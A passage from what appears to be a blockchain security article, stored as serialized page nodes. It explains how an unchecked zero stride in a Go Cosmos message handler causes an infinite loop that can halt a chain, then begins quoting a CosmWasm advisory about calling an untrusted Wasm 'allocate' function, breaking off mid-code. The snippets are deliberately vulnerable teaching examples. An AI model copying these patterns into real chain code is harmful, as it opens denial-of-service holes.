returns",{"type":24,"tag":301,"props":82708,"children":82709},{"style":359},[82710],{"type":30,"value":873},{"type":24,"tag":301,"props":82712,"children":82713},{"style":10246},[82714],{"type":30,"value":82715},"uint64",{"type":24,"tag":301,"props":82717,"children":82718},{"style":359},[82719],{"type":30,"value":398},{"type":24,"tag":301,"props":82721,"children":82722},{"class":303,"line":415},[82723,82727,82732,82736],{"type":24,"tag":301,"props":82724,"children":82725},{"style":10246},[82726],{"type":30,"value":82643},{"type":24,"tag":301,"props":82728,"children":82729},{"style":359},[82730],{"type":30,"value":82731}," idx ",{"type":24,"tag":301,"props":82733,"children":82734},{"style":385},[82735],{"type":30,"value":523},{"type":24,"tag":301,"props":82737,"children":82738},{"style":359},[82739],{"type":30,"value":82740}," start;\n",{"type":24,"tag":301,"props":82742,"children":82743},{"class":303,"line":439},[82744,82748,82753,82757,82761],{"type":24,"tag":301,"props":82745,"children":82746},{"style":10246},[82747],{"type":30,"value":82643},{"type":24,"tag":301,"props":82749,"children":82750},{"style":359},[82751],{"type":30,"value":82752}," sum ",{"type":24,"tag":301,"props":82754,"children":82755},{"style":385},[82756],{"type":30,"value":523},{"type":24,"tag":301,"props":82758,"children":82759},{"style":466},[82760],{"type":30,"value":685},{"type":24,"tag":301,"props":82762,"children":82763},{"style":359},[82764],{"type":30,"value":492},{"type":24,"tag":301,"props":82766,"children":82767},{"class":303,"line":447},[82768,82772,82777,82781],{"type":24,"tag":301,"props":82769,"children":82770},{"style":10246},[82771],{"type":30,"value":82643},{"type":24,"tag":301,"props":82773,"children":82774},{"style":359},[82775],{"type":30,"value":82776}," end ",{"type":24,"tag":301,"props":82778,"children":82779},{"style":385},[82780],{"type":30,"value":523},{"type":24,"tag":301,"props":82782,"children":82783},{"style":359},[82784],{"type":30,"value":82785}," arr.length;\n",{"type":24,"tag":301,"props":82787,"children":82788},{"class":303,"line":476},[82789],{"type":24,"tag":301,"props":82790,"children":82791},{"emptyLinePlaceholder":16},[82792],{"type":30,"value":341},{"type":24,"tag":301,"props":82794,"children":82795},{"class":303,"line":495},[82796,82800,82805,82809],{"type":24,"tag":301,"props":82797,"children":82798},{"style":308},[82799],{"type":30,"value":71085},{"type":24,"tag":301,"props":82801,"children":82802},{"style":359},[82803],{"type":30,"value":82804}," (idx ",{"type":24,"tag":301,"props":82806,"children":82807},{"style":385},[82808],{"type":30,"value":1849},{"type":24,"tag":301,"props":82810,"children":82811},{"style":359},[82812],{"type":30,"value":82813}," end) {\n",{"type":24,"tag":301,"props":82815,"children":82816},{"class":303,"line":504},[82817,82822,82826],{"type":24,"tag":301,"props":82818,"children":82819},{"style":359},[82820],{"type":30,"value":82821}," sum ",{"type":24,"tag":301,"props":82823,"children":82824},{"style":385},[82825],{"type":30,"value":75150},{"type":24,"tag":301,"props":82827,"children":82828},{"style":359},[82829],{"type":30,"value":82830}," arr[idx];\n",{"type":24,"tag":301,"props":82832,"children":82833},{"class":303,"line":512},[82834,82839,82843],{"type":24,"tag":301,"props":82835,"children":82836},{"style":359},[82837],{"type":30,"value":82838}," idx ",{"type":24,"tag":301,"props":82840,"children":82841},{"style":385},[82842],{"type":30,"value":75150},{"type":24,"tag":301,"props":82844,"children":82845},{"style":359},[82846],{"type":30,"value":82847}," stride;\n",{"type":24,"tag":301,"props":82849,"children":82850},{"class":303,"line":592},[82851],{"type":24,"tag":301,"props":82852,"children":82853},{"style":359},[82854],{"type":30,"value":501},{"type":24,"tag":301,"props":82856,"children":82857},{"class":303,"line":619},[82858,82862],{"type":24,"tag":301,"props":82859,"children":82860},{"style":308},[82861],{"type":30,"value":680},{"type":24,"tag":301,"props":82863,"children":82864},{"style":359},[82865],{"type":30,"value":82866}," sum;\n",{"type":24,"tag":301,"props":82868,"children":82869},{"class":303,"line":635},[82870],{"type":24,"tag":301,"props":82871,"children":82872},{"style":359},[82873],{"type":30,"value":698},{"type":24,"tag":291,"props":82875,"children":82879},{"code":82876,"language":82877,"meta":7,"className":82878,"style":7},"type MsgSumWithStrideParams struct {\n Start uint64\n Stride uint64\n Arr []uint64\n}\n\ntype MsgSumWithStrideResponse struct {\n Sum uint64\n}\n\nfunc (ms msgServer) SumWithStride(\n goCtx context.Context,\n msg *MsgSumWithStrideParams,\n) (*MsgSumWithStrideResponse, error) {\n sum := uint64(0)\n end := uint64(len(msg.Arr))\n for idx := msg.Start; idx \u003C end; idx += msg.Stride {\n sum += msg.Arr[idx]\n }\n return &MsgSumWithStrideResponse{Sum: sum}, nil\n}\n","go","language-go shiki shiki-themes slack-dark",[82880],{"type":24,"tag":145,"props":82881,"children":82882},{"__ignoreMap":7},[82883,82903,82916,82928,82946,82953,82960,82980,82992,82999,83006,83041,83067,83088,83117,83147,83192,83268,83304,83311,83355],{"type":24,"tag":301,"props":82884,"children":82885},{"class":303,"line":304},[82886,82890,82895,82899],{"type":24,"tag":301,"props":82887,"children":82888},{"style":348},[82889],{"type":30,"value":7026},{"type":24,"tag":301,"props":82891,"children":82892},{"style":10246},[82893],{"type":30,"value":82894}," MsgSumWithStrideParams",{"type":24,"tag":301,"props":82896,"children":82897},{"style":348},[82898],{"type":30,"value":27920},{"type":24,"tag":301,"props":82900,"children":82901},{"style":359},[82902],{"type":30,"value":3035},{"type":24,"tag":301,"props":82904,"children":82905},{"class":303,"line":320},[82906,82911],{"type":24,"tag":301,"props":82907,"children":82908},{"style":369},[82909],{"type":30,"value":82910}," Start",{"type":24,"tag":301,"props":82912,"children":82913},{"style":10246},[82914],{"type":30,"value":82915}," uint64\n",{"type":24,"tag":301,"props":82917,"children":82918},{"class":303,"line":335},[82919,82924],{"type":24,"tag":301,"props":82920,"children":82921},{"style":369},[82922],{"type":30,"value":82923}," Stride",{"type":24,"tag":301,"props":82925,"children":82926},{"style":10246},[82927],{"type":30,"value":82915},{"type":24,"tag":301,"props":82929,"children":82930},{"class":303,"line":344},[82931,82936,82941],{"type":24,"tag":301,"props":82932,"children":82933},{"style":369},[82934],{"type":30,"value":82935}," Arr",{"type":24,"tag":301,"props":82937,"children":82938},{"style":359},[82939],{"type":30,"value":82940}," []",{"type":24,"tag":301,"props":82942,"children":82943},{"style":10246},[82944],{"type":30,"value":82945},"uint64\n",{"type":24,"tag":301,"props":82947,"children":82948},{"class":303,"line":401},[82949],{"type":24,"tag":301,"props":82950,"children":82951},{"style":359},[82952],{"type":30,"value":698},{"type":24,"tag":301,"props":82954,"children":82955},{"class":303,"line":415},[82956],{"type":24,"tag":301,"props":82957,"children":82958},{"emptyLinePlaceholder":16},[82959],{"type":30,"value":341},{"type":24,"tag":301,"props":82961,"children":82962},{"class":303,"line":439},[82963,82967,82972,82976],{"type":24,"tag":301,"props":82964,"children":82965},{"style":348},[82966],{"type":30,"value":7026},{"type":24,"tag":301,"props":82968,"children":82969},{"style":10246},[82970],{"type":30,"value":82971}," MsgSumWithStrideResponse",{"type":24,"tag":301,"props":82973,"children":82974},{"style":348},[82975],{"type":30,"value":27920},{"type":24,"tag":301,"props":82977,"children":82978},{"style":359},[82979],{"type":30,"value":3035},{"type":24,"tag":301,"props":82981,"children":82982},{"class":303,"line":447},[82983,82988],{"type":24,"tag":301,"props":82984,"children":82985},{"style":369},[82986],{"type":30,"value":82987}," Sum",{"type":24,"tag":301,"props":82989,"children":82990},{"style":10246},[82991],{"type":30,"value":82915},{"type":24,"tag":301,"props":82993,"children":82994},{"class":303,"line":476},[82995],{"type":24,"tag":301,"props":82996,"children":82997},{"style":359},[82998],{"type":30,"value":698},{"type":24,"tag":301,"props":83000,"children":83001},{"class":303,"line":495},[83002],{"type":24,"tag":301,"props":83003,"children":83004},{"emptyLinePlaceholder":16},[83005],{"type":30,"value":341},{"type":24,"tag":301,"props":83007,"children":83008},{"class":303,"line":504},[83009,83014,83018,83023,83028,83032,83037],{"type":24,"tag":301,"props":83010,"children":83011},{"style":348},[83012],{"type":30,"value":83013},"func",{"type":24,"tag":301,"props":83015,"children":83016},{"style":359},[83017],{"type":30,"value":873},{"type":24,"tag":301,"props":83019,"children":83020},{"style":369},[83021],{"type":30,"value":83022},"ms ",{"type":24,"tag":301,"props":83024,"children":83025},{"style":10246},[83026],{"type":30,"value":83027},"msgServer",{"type":24,"tag":301,"props":83029,"children":83030},{"style":359},[83031],{"type":30,"value":911},{"type":24,"tag":301,"props":83033,"children":83034},{"style":314},[83035],{"type":30,"value":83036},"SumWithStride",{"type":24,"tag":301,"props":83038,"children":83039},{"style":359},[83040],{"type":30,"value":1707},{"type":24,"tag":301,"props":83042,"children":83043},{"class":303,"line":512},[83044,83049,83054,83058,83063],{"type":24,"tag":301,"props":83045,"children":83046},{"style":369},[83047],{"type":30,"value":83048}," goCtx",{"type":24,"tag":301,"props":83050,"children":83051},{"style":10246},[83052],{"type":30,"value":83053}," context",{"type":24,"tag":301,"props":83055,"children":83056},{"style":359},[83057],{"type":30,"value":206},{"type":24,"tag":301,"props":83059,"children":83060},{"style":10246},[83061],{"type":30,"value":83062},"Context",{"type":24,"tag":301,"props":83064,"children":83065},{"style":359},[83066],{"type":30,"value":1729},{"type":24,"tag":301,"props":83068,"children":83069},{"class":303,"line":592},[83070,83075,83079,83084],{"type":24,"tag":301,"props":83071,"children":83072},{"style":369},[83073],{"type":30,"value":83074}," msg",{"type":24,"tag":301,"props":83076,"children":83077},{"style":385},[83078],{"type":30,"value":431},{"type":24,"tag":301,"props":83080,"children":83081},{"style":10246},[83082],{"type":30,"value":83083},"MsgSumWithStrideParams",{"type":24,"tag":301,"props":83085,"children":83086},{"style":359},[83087],{"type":30,"value":1729},{"type":24,"tag":301,"props":83089,"children":83090},{"class":303,"line":619},[83091,83096,83100,83105,83109,83113],{"type":24,"tag":301,"props":83092,"children":83093},{"style":359},[83094],{"type":30,"value":83095},") (",{"type":24,"tag":301,"props":83097,"children":83098},{"style":385},[83099],{"type":30,"value":772},{"type":24,"tag":301,"props":83101,"children":83102},{"style":10246},[83103],{"type":30,"value":83104},"MsgSumWithStrideResponse",{"type":24,"tag":301,"props":83106,"children":83107},{"style":359},[83108],{"type":30,"value":377},{"type":24,"tag":301,"props":83110,"children":83111},{"style":10246},[83112],{"type":30,"value":21654},{"type":24,"tag":301,"props":83114,"children":83115},{"style":359},[83116],{"type":30,"value":398},{"type":24,"tag":301,"props":83118,"children":83119},{"class":303,"line":635},[83120,83125,83130,83135,83139,83143],{"type":24,"tag":301,"props":83121,"children":83122},{"style":369},[83123],{"type":30,"value":83124}," sum",{"type":24,"tag":301,"props":83126,"children":83127},{"style":385},[83128],{"type":30,"value":83129}," :=",{"type":24,"tag":301,"props":83131,"children":83132},{"style":10246},[83133],{"type":30,"value":83134}," uint64",{"type":24,"tag":301,"props":83136,"children":83137},{"style":359},[83138],{"type":30,"value":362},{"type":24,"tag":301,"props":83140,"children":83141},{"style":466},[83142],{"type":30,"value":584},{"type":24,"tag":301,"props":83144,"children":83145},{"style":359},[83146],{"type":30,"value":791},{"type":24,"tag":301,"props":83148,"children":83149},{"class":303,"line":643},[83150,83155,83159,83163,83167,83171,83175,83179,83183,83188],{"type":24,"tag":301,"props":83151,"children":83152},{"style":369},[83153],{"type":30,"value":83154}," end",{"type":24,"tag":301,"props":83156,"children":83157},{"style":385},[83158],{"type":30,"value":83129},{"type":24,"tag":301,"props":83160,"children":83161},{"style":10246},[83162],{"type":30,"value":83134},{"type":24,"tag":301,"props":83164,"children":83165},{"style":359},[83166],{"type":30,"value":362},{"type":24,"tag":301,"props":83168,"children":83169},{"style":314},[83170],{"type":30,"value":6156},{"type":24,"tag":301,"props":83172,"children":83173},{"style":359},[83174],{"type":30,"value":362},{"type":24,"tag":301,"props":83176,"children":83177},{"style":369},[83178],{"type":30,"value":64663},{"type":24,"tag":301,"props":83180,"children":83181},{"style":359},[83182],{"type":30,"value":206},{"type":24,"tag":301,"props":83184,"children":83185},{"style":369},[83186],{"type":30,"value":83187},"Arr",{"type":24,"tag":301,"props":83189,"children":83190},{"style":359},[83191],{"type":30,"value":9381},{"type":24,"tag":301,"props":83193,"children":83194},{"class":303,"line":652},[83195,83199,83204,83208,83213,83217,83222,83226,83230,83234,83239,83243,83247,83251,83255,83259,83264],{"type":24,"tag":301,"props":83196,"children":83197},{"style":308},[83198],{"type":30,"value":3249},{"type":24,"tag":301,"props":83200,"children":83201},{"style":369},[83202],{"type":30,"value":83203}," idx",{"type":24,"tag":301,"props":83205,"children":83206},{"style":385},[83207],{"type":30,"value":83129},{"type":24,"tag":301,"props":83209,"children":83210},{"style":369},[83211],{"type":30,"value":83212}," msg",{"type":24,"tag":301,"props":83214,"children":83215},{"style":359},[83216],{"type":30,"value":206},{"type":24,"tag":301,"props":83218,"children":83219},{"style":369},[83220],{"type":30,"value":83221},"Start",{"type":24,"tag":301,"props":83223,"children":83224},{"style":359},[83225],{"type":30,"value":3940},{"type":24,"tag":301,"props":83227,"children":83228},{"style":369},[83229],{"type":30,"value":1076},{"type":24,"tag":301,"props":83231,"children":83232},{"style":385},[83233],{"type":30,"value":3950},{"type":24,"tag":301,"props":83235,"children":83236},{"style":369},[83237],{"type":30,"value":83238}," end",{"type":24,"tag":301,"props":83240,"children":83241},{"style":359},[83242],{"type":30,"value":3940},{"type":24,"tag":301,"props":83244,"children":83245},{"style":369},[83246],{"type":30,"value":1076},{"type":24,"tag":301,"props":83248,"children":83249},{"style":385},[83250],{"type":30,"value":21855},{"type":24,"tag":301,"props":83252,"children":83253},{"style":369},[83254],{"type":30,"value":83212},{"type":24,"tag":301,"props":83256,"children":83257},{"style":359},[83258],{"type":30,"value":206},{"type":24,"tag":301,"props":83260,"children":83261},{"style":369},[83262],{"type":30,"value":83263},"Stride",{"type":24,"tag":301,"props":83265,"children":83266},{"style":359},[83267],{"type":30,"value":3035},{"type":24,"tag":301,"props":83269,"children":83270},{"class":303,"line":666},[83271,83276,83280,83284,83288,83292,83296,83300],{"type":24,"tag":301,"props":83272,"children":83273},{"style":369},[83274],{"type":30,"value":83275}," sum",{"type":24,"tag":301,"props":83277,"children":83278},{"style":385},[83279],{"type":30,"value":21855},{"type":24,"tag":301,"props":83281,"children":83282},{"style":369},[83283],{"type":30,"value":83212},{"type":24,"tag":301,"props":83285,"children":83286},{"style":359},[83287],{"type":30,"value":206},{"type":24,"tag":301,"props":83289,"children":83290},{"style":369},[83291],{"type":30,"value":83187},{"type":24,"tag":301,"props":83293,"children":83294},{"style":359},[83295],{"type":30,"value":541},{"type":24,"tag":301,"props":83297,"children":83298},{"style":369},[83299],{"type":30,"value":1076},{"type":24,"tag":301,"props":83301,"children":83302},{"style":359},[83303],{"type":30,"value":4059},{"type":24,"tag":301,"props":83305,"children":83306},{"class":303,"line":674},[83307],{"type":24,"tag":301,"props":83308,"children":83309},{"style":359},[83310],{"type":30,"value":501},{"type":24,"tag":301,"props":83312,"children":83313},{"class":303,"line":692},[83314,83318,83322,83326,83331,83336,83340,83345,83350],{"type":24,"tag":301,"props":83315,"children":83316},{"style":308},[83317],{"type":30,"value":680},{"type":24,"tag":301,"props":83319,"children":83320},{"style":385},[83321],{"type":30,"value":991},{"type":24,"tag":301,"props":83323,"children":83324},{"style":10246},[83325],{"type":30,"value":83104},{"type":24,"tag":301,"props":83327,"children":83328},{"style":359},[83329],{"type":30,"value":83330},"{",{"type":24,"tag":301,"props":83332,"children":83333},{"style":369},[83334],{"type":30,"value":83335},"Sum",{"type":24,"tag":301,"props":83337,"children":83338},{"style":359},[83339],{"type":30,"value":5615},{"type":24,"tag":301,"props":83341,"children":83342},{"style":369},[83343],{"type":30,"value":83344},"sum",{"type":24,"tag":301,"props":83346,"children":83347},{"style":359},[83348],{"type":30,"value":83349},"}, ",{"type":24,"tag":301,"props":83351,"children":83352},{"style":348},[83353],{"type":30,"value":83354},"nil\n",{"type":24,"tag":301,"props":83356,"children":83357},{"class":303,"line":3631},[83358],{"type":24,"tag":301,"props":83359,"children":83360},{"style":359},[83361],{"type":30,"value":698},{"type":24,"tag":32,"props":83363,"children":83364},{},[83365,83367,83372,83373,83379],{"type":30,"value":83366},"The provided Solidity / Cosmos snippets feature a public function that calculates the sums of an array using a provided starting ",{"type":24,"tag":145,"props":83368,"children":83370},{"className":83369},[],[83371],{"type":30,"value":1076},{"type":30,"value":14130},{"type":24,"tag":145,"props":83374,"children":83376},{"className":83375},[],[83377],{"type":30,"value":83378},"stride",{"type":30,"value":83380},". It is crucial to note that this function lacks robustness. A keen observer might have already identified that if the user supplies a stride value of 0, the code will result in an infinite loop.",{"type":24,"tag":32,"props":83382,"children":83383},{},[83384],{"type":30,"value":83385},"While an infinite loop is not ideal for Solidity, it may still be tolerable. The underlying blockchain on which a smart contract operates is responsible for monitoring the gas and computation budget. It will intervene and terminate the execution at a certain point. Interestingly, those types of \"unhandled error\" patterns are quite common occurrences in contracts.",{"type":24,"tag":32,"props":83387,"children":83388},{},[83389],{"type":30,"value":83390},"However, the same logic does not directly apply to Cosmos. In Cosmos, users are responsible for implementing the entire L1, and there is no underlying computation budget tracker that automatically stops code execution. As a result, any potential logic DoS or infinite loop can directly lead to the custom Cosmos L1 chain halting or stalling.",{"type":24,"tag":32,"props":83392,"children":83393},{},[83394],{"type":30,"value":83395},"This toy scenario captures the importance of attention to error handling, edge cases, and overall robustness in Cosmos.",{"type":24,"tag":80,"props":83397,"children":83399},{"id":83398},"real-world-examples",[83400],{"type":30,"value":83401},"Real-World Examples",{"type":24,"tag":32,"props":83403,"children":83404},{},[83405],{"type":30,"value":83406},"Now, let's examine a few real-world instances.",{"type":24,"tag":32,"props":83408,"children":83409},{},[83410,83412,83418,83419,83425,83427,83433,83435,83441],{"type":30,"value":83411},"In the case of ",{"type":24,"tag":188,"props":83413,"children":83416},{"href":83414,"rel":83415},"https://github.com/JumpCrypto/security-research/blob/e900a400f763075bdae161f4fd6e36d70da1d844/advisories/2023-003-cosmwasm.md",[192],[83417],{"type":30,"value":8801},{"type":30,"value":13277},{"type":24,"tag":145,"props":83420,"children":83422},{"className":83421},[],[83423],{"type":30,"value":83424},"CosmWasm",{"type":30,"value":83426}," bug, the helper method ",{"type":24,"tag":145,"props":83428,"children":83430},{"className":83429},[],[83431],{"type":30,"value":83432},"write_to_contract",{"type":30,"value":83434}," negligently calls the untrusted Wasm function ",{"type":24,"tag":145,"props":83436,"children":83438},{"className":83437},[],[83439],{"type":30,"value":83440},"\"allocate\"",{"type":30,"value":206},{"type":24,"tag":32,"props":83443,"children":83444},{},[83445],{"type":24,"tag":188,"props":83446,"children":83449},{"href":83447,"rel":83448},"https://github.com/CosmWasm/cosmwasm/blob/db426f9b15eabf18359df62878847bbaa7cb85ef/packages/vm/src/imports.rs#L409",[192],[83450],{"type":30,"value":83451},"Permalink for snippet",{"type":24,"tag":291,"props":83453,"children":83455},{"code":83454,"language":9817,"meta":7,"className":9818,"style":7},"fn write_to_contract\u003CA: BackendApi, S: Storage, Q: Querier>(\n env: &Environment\u003CA, S, Q>,\n input: &[u8],\n) -> VmResult\u003Cu32> {\n let out_size = to_u32(input.len())?;\n let result = env.call_function1(\"allocate\", &[out_size.into()])?;\n let target_ptr = ref_to_u32(&result)?;\n if target_ptr == 0 {\n return Err(CommunicationError::zero_address().into());\n }\n write_region(&env.memory(), target_ptr, input)?;\n Ok(target_ptr)\n}\n",[83456],{"type":24,"tag":145,"props":83457,"children":83458},{"__ignoreMap":7},[83459,83528,83576,83604,83633,83682,83756,83801,83824,83869,83876,83933,83952],{"type":24,"tag":301,"props":83460,"children":83461},{"class":303,"line":304},[83462,83466,83471,83475,83480,83484,83489,83493,83497,83501,83506,83510,83515,83519,83524],{"type":24,"tag":301,"props":83463,"children":83464},{"style":348},[83465],{"type":30,"value":27037},{"type":24,"tag":301,"props":83467,"children":83468},{"style":314},[83469],{"type":30,"value":83470}," write_to_contract",{"type":24,"tag":301,"props":83472,"children":83473},{"style":359},[83474],{"type":30,"value":1849},{"type":24,"tag":301,"props":83476,"children":83477},{"style":10246},[83478],{"type":30,"value":83479},"A",{"type":24,"tag":301,"props":83481,"children":83482},{"style":385},[83483],{"type":30,"value":1679},{"type":24,"tag":301,"props":83485,"children":83486},{"style":10246},[83487],{"type":30,"value":83488}," BackendApi",{"type":24,"tag":301,"props":83490,"children":83491},{"style":359},[83492],{"type":30,"value":377},{"type":24,"tag":301,"props":83494,"children":83495},{"style":10246},[83496],{"type":30,"value":28819},{"type":24,"tag":301,"props":83498,"children":83499},{"style":385},[83500],{"type":30,"value":1679},{"type":24,"tag":301,"props":83502,"children":83503},{"style":10246},[83504],{"type":30,"value":83505}," Storage",{"type":24,"tag":301,"props":83507,"children":83508},{"style":359},[83509],{"type":30,"value":377},{"type":24,"tag":301,"props":83511,"children":83512},{"style":10246},[83513],{"type":30,"value":83514},"Q",{"type":24,"tag":301,"props":83516,"children":83517},{"style":385},[83518],{"type":30,"value":1679},{"type":24,"tag":301,"props":83520,"children":83521},{"style":10246},[83522],{"type":30,"value":83523}," Querier",{"type":24,"tag":301,"props":83525,"children":83526},{"style":359},[83527],{"type":30,"value":13407},{"type":24,"tag":301,"props":83529,"children":83530},{"class":303,"line":320},[83531,83535,83539,83543,83548,83552,83556,83560,83564,83568,83572],{"type":24,"tag":301,"props":83532,"children":83533},{"style":369},[83534],{"type":30,"value":10665},{"type":24,"tag":301,"props":83536,"children":83537},{"style":385},[83538],{"type":30,"value":1679},{"type":24,"tag":301,"props":83540,"children":83541},{"style":385},[83542],{"type":30,"value":991},{"type":24,"tag":301,"props":83544,"children":83545},{"style":10246},[83546],{"type":30,"value":83547},"Environment",{"type":24,"tag":301,"props":83549,"children":83550},{"style":359},[83551],{"type":30,"value":1849},{"type":24,"tag":301,"props":83553,"children":83554},{"style":10246},[83555],{"type":30,"value":83479},{"type":24,"tag":301,"props":83557,"children":83558},{"style":359},[83559],{"type":30,"value":377},{"type":24,"tag":301,"props":83561,"children":83562},{"style":10246},[83563],{"type":30,"value":28819},{"type":24,"tag":301,"props":83565,"children":83566},{"style":359},[83567],{"type":30,"value":377},{"type":24,"tag":301,"props":83569,"children":83570},{"style":10246},[83571],{"type":30,"value":83514},{"type":24,"tag":301,"props":83573,"children":83574},{"style":359},[83575],{"type":30,"value":12957},{"type":24,"tag":301,"props":83577,"children":83578},{"class":303,"line":335},[83579,83584,83588,83592,83596,83600],{"type":24,"tag":301,"props":83580,"children":83581},{"style":369},[83582],{"type":30,"value":83583}," input",{"type":24,"tag":301,"props":83585,"children":83586},{"style":385},[83587],{"type":30,"value":1679},{"type":24,"tag":301,"props":83589,"children":83590},{"style":385},[83591],{"type":30,"value":991},{"type":24,"tag":301,"props":83593,"children":83594},{"style":359},[83595],{"type":30,"value":541},{"type":24,"tag":301,"props":83597,"children":83598},{"style":10246},[83599],{"type":30,"value":10249},{"type":24,"tag":301,"props":83601,"children":83602},{"style":359},[83603],{"type":30,"value":21055},{"type":24,"tag":301,"props":83605,"children":83606},{"class":303,"line":344},[83607,83611,83615,83620,83624,83629],{"type":24,"tag":301,"props":83608,"children":83609},{"style":359},[83610],{"type":30,"value":911},{"type":24,"tag":301,"props":83612,"children":83613},{"style":385},[83614],{"type":30,"value":882},{"type":24,"tag":301,"props":83616,"children":83617},{"style":10246},[83618],{"type":30,"value":83619}," VmResult",{"type":24,"tag":301,"props":83621,"children":83622},{"style":359},[83623],{"type":30,"value":1849},{"type":24,"tag":301,"props":83625,"children":83626},{"style":10246},[83627],{"type":30,"value":83628},"u32",{"type":24,"tag":301,"props":83630,"children":83631},{"style":359},[83632],{"type":30,"value":14097},{"type":24,"tag":301,"props":83634,"children":83635},{"class":303,"line":401},[83636,83640,83645,83649,83654,83658,83662,83666,83670,83674,83678],{"type":24,"tag":301,"props":83637,"children":83638},{"style":348},[83639],{"type":30,"value":9838},{"type":24,"tag":301,"props":83641,"children":83642},{"style":369},[83643],{"type":30,"value":83644}," out_size",{"type":24,"tag":301,"props":83646,"children":83647},{"style":385},[83648],{"type":30,"value":2537},{"type":24,"tag":301,"props":83650,"children":83651},{"style":314},[83652],{"type":30,"value":83653}," to_u32",{"type":24,"tag":301,"props":83655,"children":83656},{"style":359},[83657],{"type":30,"value":362},{"type":24,"tag":301,"props":83659,"children":83660},{"style":369},[83661],{"type":30,"value":15181},{"type":24,"tag":301,"props":83663,"children":83664},{"style":385},[83665],{"type":30,"value":206},{"type":24,"tag":301,"props":83667,"children":83668},{"style":314},[83669],{"type":30,"value":6156},{"type":24,"tag":301,"props":83671,"children":83672},{"style":359},[83673],{"type":30,"value":48700},{"type":24,"tag":301,"props":83675,"children":83676},{"style":385},[83677],{"type":30,"value":2003},{"type":24,"tag":301,"props":83679,"children":83680},{"style":359},[83681],{"type":30,"value":492},{"type":24,"tag":301,"props":83683,"children":83684},{"class":303,"line":415},[83685,83689,83693,83697,83701,83705,83710,83714,83718,83722,83726,83730,83735,83739,83743,83748,83752],{"type":24,"tag":301,"props":83686,"children":83687},{"style":348},[83688],{"type":30,"value":9838},{"type":24,"tag":301,"props":83690,"children":83691},{"style":369},[83692],{"type":30,"value":15967},{"type":24,"tag":301,"props":83694,"children":83695},{"style":385},[83696],{"type":30,"value":2537},{"type":24,"tag":301,"props":83698,"children":83699},{"style":369},[83700],{"type":30,"value":49694},{"type":24,"tag":301,"props":83702,"children":83703},{"style":385},[83704],{"type":30,"value":206},{"type":24,"tag":301,"props":83706,"children":83707},{"style":314},[83708],{"type":30,"value":83709},"call_function1",{"type":24,"tag":301,"props":83711,"children":83712},{"style":359},[83713],{"type":30,"value":362},{"type":24,"tag":301,"props":83715,"children":83716},{"style":329},[83717],{"type":30,"value":83440},{"type":24,"tag":301,"props":83719,"children":83720},{"style":359},[83721],{"type":30,"value":377},{"type":24,"tag":301,"props":83723,"children":83724},{"style":385},[83725],{"type":30,"value":556},{"type":24,"tag":301,"props":83727,"children":83728},{"style":359},[83729],{"type":30,"value":541},{"type":24,"tag":301,"props":83731,"children":83732},{"style":369},[83733],{"type":30,"value":83734},"out_size",{"type":24,"tag":301,"props":83736,"children":83737},{"style":385},[83738],{"type":30,"value":206},{"type":24,"tag":301,"props":83740,"children":83741},{"style":314},[83742],{"type":30,"value":21676},{"type":24,"tag":301,"props":83744,"children":83745},{"style":359},[83746],{"type":30,"value":83747},"()])",{"type":24,"tag":301,"props":83749,"children":83750},{"style":385},[83751],{"type":30,"value":2003},{"type":24,"tag":301,"props":83753,"children":83754},{"style":359},[83755],{"type":30,"value":492},{"type":24,"tag":301,"props":83757,"children":83758},{"class":303,"line":439},[83759,83763,83768,83772,83777,83781,83785,83789,83793,83797],{"type":24,"tag":301,"props":83760,"children":83761},{"style":348},[83762],{"type":30,"value":9838},{"type":24,"tag":301,"props":83764,"children":83765},{"style":369},[83766],{"type":30,"value":83767}," target_ptr",{"type":24,"tag":301,"props":83769,"children":83770},{"style":385},[83771],{"type":30,"value":2537},{"type":24,"tag":301,"props":83773,"children":83774},{"style":314},[83775],{"type":30,"value":83776}," ref_to_u32",{"type":24,"tag":301,"props":83778,"children":83779},{"style":359},[83780],{"type":30,"value":362},{"type":24,"tag":301,"props":83782,"children":83783},{"style":385},[83784],{"type":30,"value":556},{"type":24,"tag":301,"props":83786,"children":83787},{"style":369},[83788],{"type":30,"value":5599},{"type":24,"tag":301,"props":83790,"children":83791},{"style":359},[83792],{"type":30,"value":9961},{"type":24,"tag":301,"props":83794,"children":83795},{"style":385},[83796],{"type":30,"value":2003},{"type":24,"tag":301,"props":83798,"children":83799},{"style":359},[83800],{"type":30,"value":492},{"type":24,"tag":301,"props":83802,"children":83803},{"class":303,"line":447},[83804,83808,83812,83816,83820],{"type":24,"tag":301,"props":83805,"children":83806},{"style":308},[83807],{"type":30,"value":453},{"type":24,"tag":301,"props":83809,"children":83810},{"style":369},[83811],{"type":30,"value":83767},{"type":24,"tag":301,"props":83813,"children":83814},{"style":385},[83815],{"type":30,"value":2460},{"type":24,"tag":301,"props":83817,"children":83818},{"style":466},[83819],{"type":30,"value":685},{"type":24,"tag":301,"props":83821,"children":83822},{"style":359},[83823],{"type":30,"value":3035},{"type":24,"tag":301,"props":83825,"children":83826},{"class":303,"line":476},[83827,83831,83835,83839,83844,83848,83853,83857,83861,83865],{"type":24,"tag":301,"props":83828,"children":83829},{"style":308},[83830],{"type":30,"value":482},{"type":24,"tag":301,"props":83832,"children":83833},{"style":10246},[83834],{"type":30,"value":22535},{"type":24,"tag":301,"props":83836,"children":83837},{"style":359},[83838],{"type":30,"value":362},{"type":24,"tag":301,"props":83840,"children":83841},{"style":10246},[83842],{"type":30,"value":83843},"CommunicationError",{"type":24,"tag":301,"props":83845,"children":83846},{"style":385},[83847],{"type":30,"value":10308},{"type":24,"tag":301,"props":83849,"children":83850},{"style":314},[83851],{"type":30,"value":83852},"zero_address",{"type":24,"tag":301,"props":83854,"children":83855},{"style":359},[83856],{"type":30,"value":20672},{"type":24,"tag":301,"props":83858,"children":83859},{"style":385},[83860],{"type":30,"value":206},{"type":24,"tag":301,"props":83862,"children":83863},{"style":314},[83864],{"type":30,"value":21676},{"type":24,"tag":301,"props":83866,"children":83867},{"style":359},[83868],{"type":30,"value":22214},{"type":24,"tag":301,"props":83870,"children":83871},{"class":303,"line":495},[83872],{"type":24,"tag":301,"props":83873,"children":83874},{"style":359},[83875],{"type":30,"value":501},{"type":24,"tag":301,"props":83877,"children":83878},{"class":303,"line":504},[83879,83884,83888,83892,83896,83900,83904,83908,83913,83917,83921,83925,83929],{"type":24,"tag":301,"props":83880,"children":83881},{"style":314},[83882],{"type":30,"value":83883}," 